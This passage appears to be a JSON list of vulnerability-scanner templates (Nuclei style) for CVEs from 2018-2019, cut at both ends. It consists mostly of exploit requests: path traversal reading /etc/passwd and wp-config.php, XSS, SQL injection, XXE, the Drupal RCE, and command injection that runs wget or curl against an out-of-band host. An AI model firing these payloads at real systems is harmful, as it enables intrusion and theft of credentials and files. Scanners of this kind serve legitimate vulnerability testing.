Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; 